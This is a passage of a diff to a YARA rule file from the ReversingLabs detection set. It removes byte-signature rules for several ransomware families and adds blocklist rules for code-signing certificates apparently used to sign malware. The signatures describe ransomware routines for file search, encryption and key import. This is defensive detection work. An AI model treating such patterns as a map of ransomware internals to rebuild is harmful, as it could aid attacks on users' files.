-            C3 E8 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 C8 FF 75 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? DB 85 ?? ?? ?? ?? 83 C4 ?? DB 3C
-        }
-		$bc_do_extensions_2 = {
-            24 9B 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B C7 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 13 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 17 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B3 ?? EB 02 33 DB 33 C0 5A 59 59 64 89 10 EB 0C E9 ?? ?? ?? ?? 33 DB E8 ?? ??
-            ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB D0 8B C3 5F 5E 5B 8B E5 5D C2
-        }
-		$bc_do_files_1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 8B F0
-            8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B3 ?? 8B 06 E8 ?? ?? ?? ??
-            89 45 ?? 8B 16 8D 85 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B F8 85 FF 0F 85 91 00 00 00 F6 85 ?? ?? ?? ?? ?? 75 73 56 8D B5 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A5
-            5E 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 33 D2 E8 ?? ?? ?? ?? 83 C4 ?? DD 1C 24 9B 8D 45 ?? E8
-            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 36 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ??
-            ?? ?? 8B 45 ?? 8B 40 ?? 8B 00 8B 08 FF 51 ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 6F FF FF FF 8D 85 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 84 DB 0F 84 B7 00 00 00 8B 16 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D
-        }
-		$bc_do_files_2 = {
-            8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 75 7E F6 85 ?? ?? ?? ?? ?? 74 64 8B 85 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 74 52 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 40 FF 36 FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B
-            C6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8B C6 8B 55 ?? E8 57 FE FF FF 59 84 C0 75 04 33 DB EB 21 8B 55 ?? 42 8B C6
-            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 82 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
-            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$bc_main_1 = {
-            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 F9 53 56 57 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
-            89 20 33 C0 A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ??
-            ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 8D 45 ?? 8B 0D ?? ?? ?? ??
-            8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 7A 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B
-        }
-		$bc_main_2 = {
-            15 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 45 ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? 8B 0D ?? ?? ?? ?? 8B 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 11 BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B D8 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 80 FB ?? 0F 85 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? B2 ?? A1 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ED A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 83 F8 ?? 0F
-            8E ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 99 F7 3D ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 99 F7 3D
-            ?? ?? ?? ?? 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 48 85 C0 7C ?? 40 89 45 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ??
-        }
-		$bc_main2 = {
-            E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 45 ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D
-            ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $bc_main_1 at pe.entry_point ) and $bc_main_2 and $bc_main2 and $bc_bcdedit and $bc_enum_drives_a_z and $bc_do_extensions_1 and $bc_do_extensions_2 and $bc_do_files_1 and $bc_do_files_2
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Protover LLC" and pe.signatures [ i ] . serial == "42:5d:c3:e0:ca:8b:cd:ce:19:d0:0d:87:e3:f0:ba:28" and 1621900800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Bkransomware : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Afc0Ddb7Bdc8207E8C3B7204018Eecd3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BKRansomware ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "88dc5c4a-046a-52e2-b108-0a90b91d4fb6"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "73f4d6e2-6924-59fa-8ec1-305f2d5dc5a3"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.BKRansomware.yara#L1-L79"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3118098f05a13bd161af0cb1ec322878b371ff70b9f3815a04115a214c0965a2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12236-L12254"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "302e2d6b31ca5c2c33c4ec7294630fd88a9c40f70ddecdc606ccff27b24e1cd4"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BKRansomware"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B F9 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
-            57 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? EB ?? 8D A4 24 ?? ?? ?? ?? 90
-            8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ??
-            8B B5 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B
-            10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66
-            85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? 83 C1 ?? 83 C0
-            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 8D
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 83 FE ?? 74 ??
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
-            50 57 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53
-            FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 57 6A ?? 68
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B F9 68 ?? ?? ?? ?? 57 89 BD ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 56 6A ?? 53 FF 15 ?? ?? ??
-            ?? 8B F0 68 ?? ?? ?? ?? 57 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ??
-            ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ??
-            57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 8E ?? ?? ?? ?? 33
-        }
-		$encrypt_files_p2 = {
-            FF 8D 49 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? 33 F6 8D 51 ?? EB ?? 8D 49 ?? 8A 01 41 84 C0 75 ?? 2B CA 74 ?? BB ?? ?? ?? ??
-            8A 84 35 ?? ?? ?? ?? 3C ?? 7C ?? 3C ?? 7F ?? 0F BE C0 83 E8 ?? 99 F7 FB 80 C2 ?? EB
-            ?? 3C ?? 7C ?? 3C ?? 7F ?? 0F BE C0 83 E8 ?? 99 F7 FB 80 C2 ?? 88 94 35 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 46 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F0 72 ?? 8B 9D ?? ?? ??
-            ?? 6A ?? 6A ?? 57 53 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8D 9B ?? ?? ?? ??
-            8A 01 41 84 C0 75 ?? 6A ?? 8D 85 ?? ?? ?? ?? 2B CA 50 51 8D 85 ?? ?? ?? ?? 50 53 FF
-            15 ?? ?? ?? ?? 03 BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 3B BD ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 53 FF 15 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ??
-            5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x83\\xB4\\xE5\\xB7\\x9E\\xE8\\x9C\\x97\\xE7\\x89\\x9B\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:af:c0:dd:b7:bd:c8:20:7e:8c:3b:72:04:01:8e:ec:d3" or pe.signatures [ i ] . serial == "af:c0:dd:b7:bd:c8:20:7e:8c:3b:72:04:01:8e:ec:d3" ) and 1629676800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Moisha : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_38989Ec61Ecdb7391Ff5647F7D58Ad18 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Moisha ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c72f654f-955e-5ff6-ac91-19fbb858265c"
-		date = "2022-10-11"
-		modified = "2022-10-11"
+		id = "1841bbd1-4c7a-5b89-8c63-58d8a3ae1cef"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Moisha.yara#L1-L86"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "89cefbbb8ec722216721bb43eb14cc33fcd4671585051359a06b62236cbf3a6c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12256-L12272"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1795812d4daa458b157280cac7a9b13e9b67a2d78eac077691bbce2bf8aeec34"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Moisha"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            73 ?? ?? ?? ?? 0A 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 07 6F ?? ?? ?? ?? 0C 08 28
-            ?? ?? ?? ?? 2D ?? 06 08 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ??
-            ?? ?? ?? DC DE ?? 26 DE ?? 06 2A
-        }
-		$find_files_p2 = {
-            02 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
-            0B 2B ?? 07 6F ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 0D 03 09 6F ?? ?? ?? ?? 04 2C ?? 04 09
-            6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 6F ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 03 04
-            28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
-            ?? ?? ?? DC 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 03 11 ?? 6F ?? ?? ?? ?? 04 2C ?? 04
-            11 ?? 6F ?? ?? ?? ?? 2A
-        }
-		$find_files_p3 = {
-            73 ?? ?? ?? ?? 0A 06 03 7D ?? ?? ?? ?? 06 04 7D ?? ?? ?? ?? 06 05 7D ?? ?? ?? ?? 02 28
-            ?? ?? ?? ?? 39 ?? ?? ?? ?? 06 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 7B ??
-            ?? ?? ?? 2C ?? 06 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 31 ?? 06 7B ?? ?? ?? ?? 2C ?? 06 FE
-            06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 17 6F ?? ?? ?? ?? 07 17 6F ?? ?? ??
-            ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? DE ?? 26 DE ?? 02 28 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 12 ?? 28 ?? ?? ?? ?? 0D 09 6F ?? ?? ?? ?? 06 7B
-            ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 12 ?? 28
-            ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 2A
-        }
-		$import_priv_key = {
-            02 73 ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 16 13 ?? 16 13 ?? 16 13 ?? 11 ?? 6F
-            ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 33 ?? 11 ?? 6F ?? ?? ?? ?? 26 2B ?? 11 ?? 20 ??
-            ?? ?? ?? 33 ?? 11 ?? 6F ?? ?? ?? ?? 26 2B ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 6F
-            ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 2E ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 6F
-            ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 28 ?? ?? ?? ?? 13
-            ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ??
-            0B 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 0C 11 ?? 28 ?? ?? ?? ?? 13 ??
-            11 ?? 11 ?? 6F ?? ?? ?? ?? 0D 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13
-            ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13
-            ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ??
-            ?? 13 ?? 12 ?? FE 15 ?? ?? ?? ?? 12 ?? 06 7D ?? ?? ?? ?? 12 ?? 07 7D ?? ?? ?? ?? 12 ??
-            08 7D ?? ?? ?? ?? 12 ?? 09 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ??
-            ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 11 ?? 13 ?? DE ?? 11 ??
-            6F ?? ?? ?? ?? DC 11 ?? 2A
-        }
-		$encrypt_files = {
-            20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 0A 14 0B 14 0C 16 0D 20 ?? ?? ?? ?? 13 ?? 03 19 17 1D 28
-            ?? ?? ?? ?? 0B 03 19 18 1D 28 ?? ?? ?? ?? 0C 02 7B ?? ?? ?? ?? 08 17 6F ?? ?? ?? ?? 13
-            ?? 07 06 16 06 8E 69 6F ?? ?? ?? ?? 13 ?? 11 ?? 16 31 ?? 11 ?? 06 16 11 ?? 6F ?? ?? ??
-            ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 04 11 ?? 6F ?? ?? ?? ?? 04 6F ?? ?? ?? ??
-            13 ?? 11 ?? 8E 69 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 08 08 6F ?? ?? ?? ?? 16 6F ?? ?? ??
-            ?? 26 08 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 08 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 08
-            6F ?? ?? ?? ?? 17 0D DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 13 ?? DE ?? 07 2C
-            ?? 07 6F ?? ?? ?? ?? 08 2C ?? 08 6F ?? ?? ?? ?? 09 26 DC 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $import_priv_key ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RotA Games ApS" and pe.signatures [ i ] . serial == "38:98:9e:c6:1e:cd:b7:39:1f:f5:64:7f:7d:58:ad:18" and 1613088000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Wasplocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Bc6C43D206A360F2D6B58537C456B709 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WaspLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "596bf965-700a-58f5-b0e5-61ec57c23a3e"
-		date = "2022-06-28"
-		modified = "2022-06-28"
+		id = "fd19ce61-056b-549a-946e-72543ff1f7c0"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.WaspLocker.yara#L1-L76"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "852ec52328fca36d651e3176ac33a57ce26cefecadc2aad27235548e5b9813c1"
